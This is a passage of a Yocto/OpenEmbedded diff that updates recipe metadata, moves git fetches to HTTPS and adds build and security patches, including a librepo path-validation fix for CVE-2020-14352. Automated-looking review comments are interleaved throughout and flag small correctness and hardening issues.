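+ t.Errorf("%+v: want\n\t%q\ngot\n\t%q", test.x, test.js, js)
+ }
++ if test.skipNest {
++ continue
++ }
+ // Make sure that escaping corner cases are not broken
+ // by nesting.
+ a := []interface{}{test.x}
+--
+2.25.1
+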
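Review bot: The two replacements added in `jsValEscaper` match `</script` and `<!--` case-sensitively, but HTML tag names are matched case-insensitively, so an error string carrying a differently-cased closing tag would pass through unchanged. A case-insensitive match closes that gap, for example a package-level `regexp.MustCompile("(?i)</script")` applied with `ReplaceAllString(errStr, "\\x3C/script")`; `regexp` is not visibly imported in js.go here, so that needs checking, and a matching case belongs next to `jsonErrType` in the test table. In js_test.go the new `"errors"` import sits before `"bytes"`, which gofmt would reorder. `jsValEscaper` starts and ends outside the hunk.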
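--- a/meta/recipes-devtools/go/go-crosssdk.inc
+++ b/meta/recipes-devtools/go/go-crosssdk.inc
@@ -4,6 +4,8 @@ DEPENDS = "go-native virtual/${TARGET_PREFIX}gcc-crosssdk virtual/nativesdk-${TA
 PN = "go-crosssdk-${SDK_SYS}"
 PROVIDES = "virtual/${TARGET_PREFIX}go-crosssdk"
 
+export GOCACHE = "${B}/.cache"
+
 do_configure[noexec] = "1"
 
 do_compile() {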
diff --git a/meta/recipes-devtools/go/go-dep_0.5.4.bb b/meta/recipes-devtools/go/go-dep_0.5.4.bb
index 0da2c6607c..e29e53433e 100644
--- a/meta/recipes-devtools/go/go-dep_0.5.4.bb
+++ b/meta/recipes-devtools/go/go-dep_0.5.4.bb
@@ -4,7 +4,7 @@ LICENSE = "BSD-3-Clause"
4LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=1bad315647751fab0007812f70d42c0d" 4LIC_FILES_CHKSUM = "file://src/${GO_IMPORT}/LICENSE;md5=1bad315647751fab0007812f70d42c0d"
5 5
6GO_IMPORT = "github.com/golang/dep" 6GO_IMPORT = "github.com/golang/dep"
7SRC_URI = "git://${GO_IMPORT} \ 7SRC_URI = "git://${GO_IMPORT};branch=master \
8 file://0001-Add-support-for-mips-mips64.patch;patchdir=src/github.com/golang/dep \ 8 file://0001-Add-support-for-mips-mips64.patch;patchdir=src/github.com/golang/dep \
9 file://0001-bolt_riscv64-Add-support-for-riscv64.patch;patchdir=src/github.com/golang/dep \ 9 file://0001-bolt_riscv64-Add-support-for-riscv64.patch;patchdir=src/github.com/golang/dep \
10 " 10 "
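Review bot: The SRC_URI on line 7 gains `branch=master` but still has no `protocol=` parameter, so the fetch presumably falls back to the plain `git://` transport, which is neither encrypted nor authenticated. Adding the parameter moves the fetch to TLS: `SRC_URI = "git://${GO_IMPORT};branch=master;protocol=https \`. Integrity of the checkout presumably rests on a pinned SRCREV, which is outside this hunk, so this is about transport hardening and fetch reliability, not a substitute for the pin.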
diff --git a/meta/recipes-devtools/go/go_1.14.bb b/meta/recipes-devtools/go/go_1.14.bb
index bc90a1329e..76ff788238 100644
--- a/meta/recipes-devtools/go/go_1.14.bb
+++ b/meta/recipes-devtools/go/go_1.14.bb
@@ -3,12 +3,12 @@ require go-target.inc
3 3
4export GOBUILDMODE="" 4export GOBUILDMODE=""
5export CGO_ENABLED_riscv64 = "" 5export CGO_ENABLED_riscv64 = ""
6# Add pie to GOBUILDMODE to satisfy "textrel" QA checking, but mips/riscv 6# Add pie to GOBUILDMODE to satisfy "textrel" QA checking, but
7# doesn't support -buildmode=pie, so skip the QA checking for mips/riscv and its 7# windows/mips/riscv doesn't support -buildmode=pie, so skip the QA checking
8# variants. 8# for windows/mips/riscv and their variants.
9python() { 9python() {
10 if 'mips' in d.getVar('TARGET_ARCH',True) or 'riscv' in d.getVar('TARGET_ARCH',True): 10 if 'mips' in d.getVar('TARGET_ARCH') or 'riscv' in d.getVar('TARGET_ARCH') or 'windows' in d.getVar('TARGET_GOOS'):
11 d.appendVar('INSANE_SKIP_%s' % d.getVar('PN',True), " textrel") 11 d.appendVar('INSANE_SKIP_%s' % d.getVar('PN'), " textrel")
12 else: 12 else:
13 d.setVar('GOBUILDMODE', 'pie') 13 d.setVar('GOBUILDMODE', 'pie')
14} 14}
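Review bot: The new `'windows' in d.getVar('TARGET_GOOS')` test raises a TypeError if TARGET_GOOS is unset when the anonymous function runs, because `getVar` then returns None; the two TARGET_ARCH tests on the same line have the same shape. Guarding the lookups, e.g. `'windows' in (d.getVar('TARGET_GOOS') or '')`, keeps a missing variable from aborting the parse. Whether TARGET_GOOS is always defined at this point depends on the included go-target.inc, which is not visible here.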
diff --git a/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb b/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb
index a60e851897..8e5f940deb 100644
--- a/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb
+++ b/meta/recipes-devtools/help2man/help2man-native_1.47.11.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Program for creating simple man pages" 1SUMMARY = "Program for creating simple man pages"
2SECTION = "devel" 2HOMEPAGE = "https://www.gnu.org/software/help2man/"
3DESCRIPTION = "help2man is a tool for automatically generating simple manual pages from program output."SECTION = "devel"
3LICENSE = "GPLv3" 4LICENSE = "GPLv3"
4LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504" 5LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
5DEPENDS = "autoconf-native automake-native" 6DEPENDS = "autoconf-native automake-native"
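Review bot: On the new side, line 3 appears to carry two assignments run together, `DESCRIPTION = "…from program output."SECTION = "devel"`, and the hunk counts (`-1,5 +1,6`) are consistent with SECTION no longer having a line of its own. If that is what the recipe contains rather than a rendering artefact, SECTION is no longer set and the DESCRIPTION value picks up the stray text. The two should be separate lines: `DESCRIPTION = "help2man is a tool for automatically generating simple manual pages from program output."` followed by `SECTION = "devel"`.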
diff --git a/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb b/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb
index c5761170aa..fc17e8d9b4 100644
--- a/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb
+++ b/meta/recipes-devtools/i2c-tools/i2c-tools_4.1.bb
@@ -1,5 +1,6 @@
1SUMMARY = "Set of i2c tools for linux" 1SUMMARY = "Set of i2c tools for linux"
2HOMEPAGE = "https://i2c.wiki.kernel.org/index.php/I2C_Tools" 2HOMEPAGE = "https://i2c.wiki.kernel.org/index.php/I2C_Tools"
3DESCRIPTION = "The i2c-tools package contains a heterogeneous set of I2C tools for Linux: a bus probing tool, a chip dumper, register-level SMBus access helpers, EEPROM decoding scripts, EEPROM programming tools, and a python module for SMBus access. All versions of Linux are supported, as long as I2C support is included in the kernel."
3SECTION = "base" 4SECTION = "base"
4LICENSE = "GPLv2+" 5LICENSE = "GPLv2+"
5LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe" 6LIC_FILES_CHKSUM = "file://COPYING;md5=751419260aa954499f7abaabaa882bbe"
diff --git a/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb b/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb
index 304ad7fec0..ce4d73caf6 100644
--- a/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb
+++ b/meta/recipes-devtools/icecc-toolchain/nativesdk-icecc-toolchain_0.1.bb
@@ -1,6 +1,7 @@
1# Copyright (c) 2018 Joshua Watt, Garmin International,Inc. 1# Copyright (c) 2018 Joshua Watt, Garmin International,Inc.
2# Released under the MIT license (see COPYING.MIT for the terms) 2# Released under the MIT license (see COPYING.MIT for the terms)
3SUMMARY = "Generates Icecream toolchain for SDK" 3SUMMARY = "Generates Icecream toolchain for SDK"
4DESCRIPTION = "${SUMMARY}"
4LICENSE = "MIT" 5LICENSE = "MIT"
5LIC_FILES_CHKSUM = "file://${WORKDIR}/icecc-env.sh;beginline=2;endline=20;md5=dd6b68c1efed8a9fb04e409b3b287d47" 6LIC_FILES_CHKSUM = "file://${WORKDIR}/icecc-env.sh;beginline=2;endline=20;md5=dd6b68c1efed8a9fb04e409b3b287d47"
6 7
diff --git a/meta/recipes-devtools/intltool/intltool_0.51.0.bb b/meta/recipes-devtools/intltool/intltool_0.51.0.bb
index ecff2faf25..592dbb92e2 100644
--- a/meta/recipes-devtools/intltool/intltool_0.51.0.bb
+++ b/meta/recipes-devtools/intltool/intltool_0.51.0.bb
@@ -1,4 +1,6 @@
1SUMMARY = "Utility scripts for internationalizing XML" 1SUMMARY = "Utility scripts for internationalizing XML"
2HOMEPAGE = "https://launchpad.net/intltool"
3DESCRIPTION = "Utility scripts for internationalizing XML. This tool automatically extracts translatable strings from oaf, glade, bonobo ui, nautilus theme and other XML files into the po files."
2SECTION = "devel" 4SECTION = "devel"
3LICENSE = "GPLv2" 5LICENSE = "GPLv2"
4LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f" 6LIC_FILES_CHKSUM = "file://COPYING;md5=94d55d512a9ba36caa9b7df079bae19f"
diff --git a/meta/recipes-devtools/jquery/jquery_3.5.0.bb b/meta/recipes-devtools/jquery/jquery_3.5.0.bb
index 5c6f9cddbe..efffe05fd2 100644
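--- a/meta/recipes-devtools/jquery/jquery_3.5.0.bb
+++ b/meta/recipes-devtools/jquery/jquery_3.5.0.bb
@@ -1,5 +1,6 @@
 SUMMARY = "jQuery is a fast, small, and feature-rich JavaScript library"
 HOMEPAGE = "https://jquery.com/"
+DESCRIPTION = "${SUMMARY}"
 LICENSE = "MIT"
 SECTION = "devel"
 LIC_FILES_CHKSUM = "file://${WORKDIR}/${BP}.js;startline=8;endline=10;md5=b1e67ece919e852643f1541a54492d65"
@@ -16,6 +17,11 @@ SRC_URI[map.sha256sum] = "3149351c8cbc3fb230bbf6188617c7ffda77d9e14333f4f5f0aa1a
 
 UPSTREAM_CHECK_REGEX = "jquery-(?P<pver>\d+(\.\d+)+)\.js"
 
+# https://github.com/jquery/jquery/issues/3927
+# There are ways jquery can expose security issues but any issues are in the apps exposing them
+# and there is little we can directly do
+CVE_CHECK_WHITELIST += "CVE-2007-2379"
+
 inherit allarch
 
 do_install() {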
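Review bot: The comment added above `CVE_CHECK_WHITELIST += "CVE-2007-2379"` justifies the entry only in general terms, so someone auditing cve-check output cannot tell from the recipe what the CVE covers or why it was judged out of scope. I would extend it along the lines of `# CVE-2007-2379: <one-line summary of the issue>; not fixable in the library, applications must handle it (see the upstream issue above)`. The entry is not tied to a version, so it will keep suppressing this CVE across future jquery upgrades and should be re-checked when the recipe is bumped. The second hunk ends inside `do_install()`, which continues outside the hunk.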
diff --git a/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb b/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
index 98c55dca85..d9e712f74a 100644
--- a/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
+++ b/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb
@@ -1,8 +1,10 @@
1SUMMARY = "Libcomps is alternative for yum.comps library (which is for managing rpm package groups)." 1SUMMARY = "Libcomps is alternative for yum.comps library (which is for managing rpm package groups)."
2HOMEPAGE = "https://github.com/rpm-software-management/libcomps"
3DESCRIPTION = "Libcomps is alternative for yum.comps library. It's written in pure C as library and there's bindings for python2 and python3."
2LICENSE = "GPLv2" 4LICENSE = "GPLv2"
3LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" 5LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
4 6
5SRC_URI = "git://github.com/rpm-software-management/libcomps.git \ 7SRC_URI = "git://github.com/rpm-software-management/libcomps.git;branch=master;protocol=https \
6 file://0001-Add-crc32.c-to-sources-list.patch \ 8 file://0001-Add-crc32.c-to-sources-list.patch \
7 file://0002-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \ 9 file://0002-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \
8 " 10 "
diff --git a/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch b/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch
new file mode 100644
index 0000000000..61d255581b
--- /dev/null
+++ b/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch
@@ -0,0 +1,58 @@
1From b4c5a3312287f31a2075a235db846ff611586d2c Mon Sep 17 00:00:00 2001
2From: Jaroslav Mracek <jmracek@redhat.com>
3Date: Tue, 3 Sep 2019 11:01:23 +0200
4Subject: [PATCH] Mark job goal.upgrade with sltr as targeted
5
6It allows to keep installed packages in upgrade set.
7
8It also prevents from reinstalling of modified packages with same NEVRA.
9
10
11Backport commit b4c5a3312287f31a2075a235db846ff611586d2c from
12https://github.com/rpm-software-management/libdnf
13
14This bug is present in oe-core's dnf
15
16Remove changes to spec file from upstream
17
18Upstream-Status: Backport
19Signed-off-by: Jate Sujjavanich <jatedev@gmail.com>
20---
21 libdnf.spec | 4 ++--
22 libdnf/goal/Goal.cpp | 2 +-
23 libdnf/goal/Goal.hpp | 6 ++++--
24 3 files changed, 7 insertions(+), 5 deletions(-)
25
26diff --git a/libdnf/goal/Goal.cpp b/libdnf/goal/Goal.cpp
27index b69be19..a38cbb4 100644
28--- a/libdnf/goal/Goal.cpp
29+++ b/libdnf/goal/Goal.cpp
30@@ -767,7 +767,7 @@ void
31 Goal::upgrade(HySelector sltr)
32 {
33 pImpl->actions = static_cast<DnfGoalActions>(pImpl->actions | DNF_UPGRADE);
34- sltrToJob(sltr, &pImpl->staging, SOLVER_UPDATE);
35+ sltrToJob(sltr, &pImpl->staging, SOLVER_UPDATE|SOLVER_TARGETED);
36 }
37
38 void
39diff --git a/libdnf/goal/Goal.hpp b/libdnf/goal/Goal.hpp
40index f33dfa2..d701317 100644
41--- a/libdnf/goal/Goal.hpp
42+++ b/libdnf/goal/Goal.hpp
43@@ -86,8 +86,10 @@ public:
44 /**
45 * @brief If selector ill formed, it rises std::runtime_error()
46 *
47- * @param sltr p_sltr: It should contain only upgrades with obsoletes otherwise it can try to
48- * reinstall installonly packages.
49+ * @param sltr p_sltr: It contains upgrade-to packages and obsoletes. The presence of installed
50+ * packages prevents reinstalling packages with the same NEVRA but changed contant. To honor repo
51+ * priority all relevant packages must be present. To upgrade package foo from priority repo, all
52+ * installed and available packages of the foo must be in selector plus obsoletes of foo.
53 */
54 void upgrade(HySelector sltr);
55 void userInstalled(DnfPackage *pkg);
56--
572.7.4
58
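Review bot: The patch header no longer matches its body: the diffstat still lists `libdnf.spec | 4 ++--` and "3 files changed, 7 insertions(+), 5 deletions(-)", although the description says the spec-file changes were removed and only Goal.cpp and Goal.hpp are patched. The stale diffstat is harmless to `patch`, but it misleads anyone comparing this backport with the upstream commit, so it should be regenerated or the omission noted next to it. `Upstream-Status: Backport` would also be easier to audit with the source on the same line, e.g. `Upstream-Status: Backport [https://github.com/rpm-software-management/libdnf/commit/b4c5a3312287f31a2075a235db846ff611586d2c]`.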
diff --git a/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb b/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
index 43de06e7f9..39858ad401 100644
--- a/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
+++ b/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb
@@ -1,14 +1,17 @@
1SUMMARY = "Library providing simplified C and Python API to libsolv" 1SUMMARY = "Library providing simplified C and Python API to libsolv"
2HOMEPAGE = "https://github.com/rpm-software-management/libdnf"
3DESCRIPTION = "This library provides a high level package-manager. It's core library of dnf, PackageKit and rpm-ostree. It's replacement for deprecated hawkey library which it contains inside and uses librepo under the hood."
2LICENSE = "LGPLv2.1+" 4LICENSE = "LGPLv2.1+"
3LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" 5LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
4 6
5SRC_URI = "git://github.com/rpm-software-management/libdnf \ 7SRC_URI = "git://github.com/rpm-software-management/libdnf;branch=master;protocol=https \
6 file://0001-FindGtkDoc.cmake-drop-the-requirement-for-GTKDOC_SCA.patch \ 8 file://0001-FindGtkDoc.cmake-drop-the-requirement-for-GTKDOC_SCA.patch \
7 file://0004-Set-libsolv-variables-with-pkg-config-cmake-s-own-mo.patch \ 9 file://0004-Set-libsolv-variables-with-pkg-config-cmake-s-own-mo.patch \
8 file://0001-Get-parameters-for-both-libsolv-and-libsolvext-libdn.patch \ 10 file://0001-Get-parameters-for-both-libsolv-and-libsolvext-libdn.patch \
9 file://0001-Add-WITH_TESTS-option.patch \ 11 file://0001-Add-WITH_TESTS-option.patch \
10 file://0001-include-stdexcept-for-runtime_error.patch \ 12 file://0001-include-stdexcept-for-runtime_error.patch \
11 file://fix-deprecation-warning.patch \ 13 file://fix-deprecation-warning.patch \
14 file://0040-Mark-job-goal.upgrade-with-sltr-as-target.patch \
12 " 15 "
13 16
14SRCREV = "751f89045b80d58c0d05800f74357cf78cdf7e77" 17SRCREV = "751f89045b80d58c0d05800f74357cf78cdf7e77"
diff --git a/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb b/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb
index 5409051d79..7d8560f3cc 100644
--- a/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb
+++ b/meta/recipes-devtools/libmodulemd/libmodulemd-v1_git.bb
@@ -1,4 +1,6 @@
1SUMMARY = "C Library for manipulating module metadata files" 1SUMMARY = "C Library for manipulating module metadata files"
2HOMEPAGE = "https://github.com/fedora-modularity/libmodulemd"
3DESCRIPTION = "${SUMMARY}"
2LICENSE = "MIT" 4LICENSE = "MIT"
3LIC_FILES_CHKSUM = "file://COPYING;md5=25a3927bff3ee4f5b21bcb0ed3fcd6bb" 5LIC_FILES_CHKSUM = "file://COPYING;md5=25a3927bff3ee4f5b21bcb0ed3fcd6bb"
4 6
diff --git a/meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch b/meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch
new file mode 100644
index 0000000000..8f4c5b73bc
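--- /dev/null
+++ b/meta/recipes-devtools/librepo/librepo/CVE-2020-14352.patch
@@ -0,0 +1,55 @@
+From 6027d68337b537bf9a68cf810cf9b8e40dac22f8 Mon Sep 17 00:00:00 2001
+From: Jaroslav Rohel <jrohel@redhat.com>
+Date: Wed, 12 Aug 2020 08:35:28 +0200
+Subject: [PATCH] Validate path read from repomd.xml (RhBug:1868639)
+
+= changelog =
+msg: Validate path read from repomd.xml
+type: security
+resolves: https://bugzilla.redhat.com/show_bug.cgi?id=1868639
+
+Upstream-Status: Acepted [https://github.com/rpm-software-management/librepo/commit/7daea2a2429a54dad68b1de9b37a5f65c5cf2600]
+CVE: CVE-2020-14352
+Signed-off-by: Minjae Kim <flowergom@gmail.com>
+---
+ librepo/yum.c | 17 +++++++++++++++++
+ 1 file changed, 17 insertions(+)
+
+diff --git a/librepo/yum.c b/librepo/yum.c
+index 3059188..529257b 100644
+--- a/librepo/yum.c
++++ b/librepo/yum.c
+@@ -23,6 +23,7 @@
+ #define BITS_IN_BYTE 8
+
+ #include <stdio.h>
++#include <libgen.h>
+ #include <assert.h>
+ #include <stdlib.h>
+ #include <errno.h>
+@@ -770,6 +771,22 @@ prepare_repo_download_targets(LrHandle *handle,
+ continue;
+
+ char *location_href = record->location_href;
++
++ char *dest_dir = realpath(handle->destdir, NULL);
++ path = lr_pathconcat(handle->destdir, record->location_href, NULL);
++ char *requested_dir = realpath(dirname(path), NULL);
++ lr_free(path);
++ if (!g_str_has_prefix(requested_dir, dest_dir)) {
++ g_debug("%s: Invalid path: %s", __func__, location_href);
++ g_set_error(err, LR_YUM_ERROR, LRE_IO, "Invalid path: %s", location_href);
++ g_slist_free_full(*targets, (GDestroyNotify) lr_downloadtarget_free);
++ free(requested_dir);
++ free(dest_dir);
++ return FALSE;
++ }
++ free(requested_dir);
++ free(dest_dir);
++
+ gboolean is_zchunk = FALSE;
+ #ifdef WITH_ZCHUNK
+ if (handle->cachedir && record->header_checksum)
+--
+2.17.1
+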
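Review bot: In the check added to `prepare_repo_download_targets()`, neither `realpath()` result is tested for NULL before `g_str_has_prefix(requested_dir, dest_dir)`, and a plain string-prefix comparison also accepts a sibling directory whose name merely begins with the destination path (constructed example: destdir `/srv/repo` and a resolved directory `/srv/repo-other`). `realpath()` returns NULL when a path component does not exist, which seems plausible for a `location_href` subdirectory that has not been created yet, and the outcome then depends on how GLib treats a NULL argument. I would guard explicitly with `if (!dest_dir || !requested_dir || !g_str_has_prefix(requested_dir, dest_dir)) {` and additionally require that the character following the matched prefix in `requested_dir` is `/` or the end of the string. Separately, the header reads `Upstream-Status: Acepted`; for a change already merged upstream the tag would normally be `Upstream-Status: Backport [<same URL>]`. The function body starts and ends outside the hunk.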
diff --git a/meta/recipes-devtools/librepo/librepo_1.11.2.bb b/meta/recipes-devtools/librepo/librepo_1.11.2.bb
index 6a0a59f865..73a58f75e3 100644
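--- a/meta/recipes-devtools/librepo/librepo_1.11.2.bb
+++ b/meta/recipes-devtools/librepo/librepo_1.11.2.bb
@@ -1,11 +1,14 @@
 SUMMARY = "A library providing C and Python (libcURL like) API \
  for downloading linux repository metadata and packages."
+HOMEPAGE = "https://github.com/rpm-software-management/librepo"
+DESCRIPTION = "${SUMMARY}"
 LICENSE = "LGPLv2.1"
 LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c"
 
-SRC_URI = "git://github.com/rpm-software-management/librepo.git \
+SRC_URI = "git://github.com/rpm-software-management/librepo.git;branch=master;protocol=https \
  file://0002-Do-not-try-to-obtain-PYTHON_INSTALL_DIR-by-running-p.patch \
  file://0004-Set-gpgme-variables-with-pkg-config-not-with-cmake-m.patch \
+ file://CVE-2020-14352.patch \
  "
 
 SRCREV = "67c2d1f83f1bf87be3f26ba730fce7fbdf0c9fba"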
diff --git a/meta/recipes-devtools/libtool/libtool-2.4.6.inc b/meta/recipes-devtools/libtool/libtool-2.4.6.inc
index 8e17b56d46..c8744e6d5f 100644
--- a/meta/recipes-devtools/libtool/libtool-2.4.6.inc
+++ b/meta/recipes-devtools/libtool/libtool-2.4.6.inc
@@ -21,6 +21,10 @@ SRC_URI = "${GNU_MIRROR}/libtool/libtool-${PV}.tar.gz \
21 file://unwind-opt-parsing.patch \ 21 file://unwind-opt-parsing.patch \
22 file://0001-libtool-Fix-support-for-NIOS2-processor.patch \ 22 file://0001-libtool-Fix-support-for-NIOS2-processor.patch \
23 file://0001-libtool-Check-for-static-libs-for-internal-compiler-.patch \ 23 file://0001-libtool-Check-for-static-libs-for-internal-compiler-.patch \
24 file://0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch \
25 file://0001-Makefile.am-make-sure-autoheader-run-before-automake.patch \
26 file://lto-prefix.patch \
27 file://debian-no_hostname.patch \
24 " 28 "
25 29
26SRC_URI[md5sum] = "addf44b646ddb4e3919805aa88fa7c5e" 30SRC_URI[md5sum] = "addf44b646ddb4e3919805aa88fa7c5e"
diff --git a/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch
new file mode 100644
index 0000000000..2e9908725e
--- /dev/null
+++ b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch
@@ -0,0 +1,35 @@
1From dfbbbd359e43e0a55fbea06f2647279ad8761cb9 Mon Sep 17 00:00:00 2001
2From: Mingli Yu <mingli.yu@windriver.com>
3Date: Wed, 24 Mar 2021 03:04:13 +0000
4Subject: [PATCH] Makefile.am: make sure autoheader run before autoconf
5
6autoheader will update ../libtool-2.4.6/libltdl/config-h.in which
7autoconf needs, so there comes a race sometimes as below:
8 | configure.ac:45: error: required file 'config-h.in' not found
9 | touch '../libtool-2.4.6/libltdl/config-h.in'
10
11So make sure autoheader run before autoconf to avoid this race.
12
13Upstream-Status: Submitted [libtool-patches@gnu.org maillist]
14
15Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
16---
17 Makefile.am | 2 +-
18 1 file changed, 1 insertion(+), 1 deletion(-)
19
20diff --git a/Makefile.am b/Makefile.am
21index 4142c90..fe1a9fc 100644
22--- a/Makefile.am
23+++ b/Makefile.am
24@@ -365,7 +365,7 @@ lt_configure_deps = $(lt_aclocal_m4) $(lt_aclocal_m4_deps)
25 $(lt_aclocal_m4): $(lt_aclocal_m4_deps)
26 $(AM_V_GEN)cd '$(srcdir)/$(ltdl_dir)' && $(ACLOCAL) -I ../m4
27
28-$(lt_configure): $(lt_configure_deps)
29+$(lt_configure): $(lt_configure_deps) $(lt_config_h_in)
30 $(AM_V_GEN)cd '$(srcdir)/$(ltdl_dir)' && $(AUTOCONF)
31
32 $(lt_config_h_in): $(lt_configure_deps)
33--
342.29.2
35
diff --git a/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch
new file mode 100644
index 0000000000..87f8492346
--- /dev/null
+++ b/meta/recipes-devtools/libtool/libtool/0001-Makefile.am-make-sure-autoheader-run-before-automake.patch
@@ -0,0 +1,35 @@
1From e82c06584f02e3e4487aa73aa05981e2a35dc6d1 Mon Sep 17 00:00:00 2001
2From: Mingli Yu <mingli.yu@windriver.com>
3Date: Tue, 13 Apr 2021 07:17:29 +0000
4Subject: [PATCH] Makefile.am: make sure autoheader run before automake
5
6When use automake to generate Makefile.in from Makefile.am, there
7comes below race:
8 | configure.ac:45: error: required file 'config-h.in' not found
9
10It is because the file config-h.in in updating process by autoheader,
11so make automake run after autoheader to avoid the above race.
12
13Upstream-Status: Submitted [libtool-patches@gnu.org maillist]
14
15Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
16---
17 Makefile.am | 2 +-
18 1 file changed, 1 insertion(+), 1 deletion(-)
19
20diff --git a/Makefile.am b/Makefile.am
21index 2752ecc..29950db 100644
22--- a/Makefile.am
23+++ b/Makefile.am
24@@ -328,7 +328,7 @@ EXTRA_DIST += $(lt_aclocal_m4) \
25 $(lt_obsolete_m4) \
26 $(stamp_mk)
27
28-$(lt_Makefile_in): $(lt_Makefile_am) $(lt_aclocal_m4)
29+$(lt_Makefile_in): $(lt_Makefile_am) $(lt_aclocal_m4) $(lt_config_h_in)
30 $(AM_V_GEN)cd '$(srcdir)/$(ltdl_dir)' && $(AUTOMAKE) Makefile
31
32 # Don't let unused scripts leak into the libltdl Makefile
33--
342.29.2
35
diff --git a/meta/recipes-devtools/libtool/libtool/lto-prefix.patch b/meta/recipes-devtools/libtool/libtool/lto-prefix.patch
new file mode 100644
index 0000000000..2bd010b8e4
--- /dev/null
+++ b/meta/recipes-devtools/libtool/libtool/lto-prefix.patch
@@ -0,0 +1,22 @@
1If lto is enabled, we need the prefix-map variables to be passed to the linker.
2Add these to the list of options libtool passes through.
3
4Upstream-Status: Pending
5Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
6
7Index: libtool-2.4.6/build-aux/ltmain.in
8===================================================================
9--- libtool-2.4.6.orig/build-aux/ltmain.in
10+++ libtool-2.4.6/build-aux/ltmain.in
11@@ -5424,9 +5424,10 @@ func_mode_link ()
12 # --sysroot=* for sysroot support
13 # -O*, -g*, -flto*, -fwhopr*, -fuse-linker-plugin GCC link-time optimization
14 # -stdlib=* select c++ std lib with clang
15+ # -f*-prefix-map* needed for lto linking
16 -64|-mips[0-9]|-r[0-9][0-9]*|-xarch=*|-xtarget=*|+DA*|+DD*|-q*|-m*| \
17 -t[45]*|-txscale*|-p|-pg|--coverage|-fprofile-*|-F*|@*|-tp=*|--sysroot=*| \
18- -O*|-g*|-flto*|-fwhopr*|-fuse-linker-plugin|-fstack-protector*|-stdlib=*)
19+ -O*|-g*|-flto*|-fwhopr*|-fuse-linker-plugin|-fstack-protector*|-stdlib=*|-f*-prefix-map*)
20 func_quote_for_eval "$arg"
21 arg=$func_quote_for_eval_result
22 func_append compile_command " $arg"
diff --git a/meta/recipes-devtools/libtool/libtool_2.4.6.bb b/meta/recipes-devtools/libtool/libtool_2.4.6.bb
index a5715faaa9..f5fdd00e5e 100644
--- a/meta/recipes-devtools/libtool/libtool_2.4.6.bb
+++ b/meta/recipes-devtools/libtool/libtool_2.4.6.bb
@@ -1,6 +1,6 @@
1require libtool-${PV}.inc 1require libtool-${PV}.inc
2 2
3SRC_URI += "file://multilib.patch file://debian-no_hostname.patch" 3SRC_URI += "file://multilib.patch"
4 4
5RDEPENDS_${PN} += "bash" 5RDEPENDS_${PN} += "bash"
6 6
diff --git a/meta/recipes-devtools/llvm/llvm_git.bb b/meta/recipes-devtools/llvm/llvm_git.bb
index 534e2c685f..de92cef1a4 100644
--- a/meta/recipes-devtools/llvm/llvm_git.bb
+++ b/meta/recipes-devtools/llvm/llvm_git.bb
@@ -30,7 +30,7 @@ LLVM_DIR = "llvm${LLVM_RELEASE}"
30 30
31BRANCH = "release/${MAJOR_VERSION}.x" 31BRANCH = "release/${MAJOR_VERSION}.x"
32SRCREV = "c1a0a213378a458fbea1a5c77b315c7dce08fd05" 32SRCREV = "c1a0a213378a458fbea1a5c77b315c7dce08fd05"
33SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH} \ 33SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH};protocol=https \
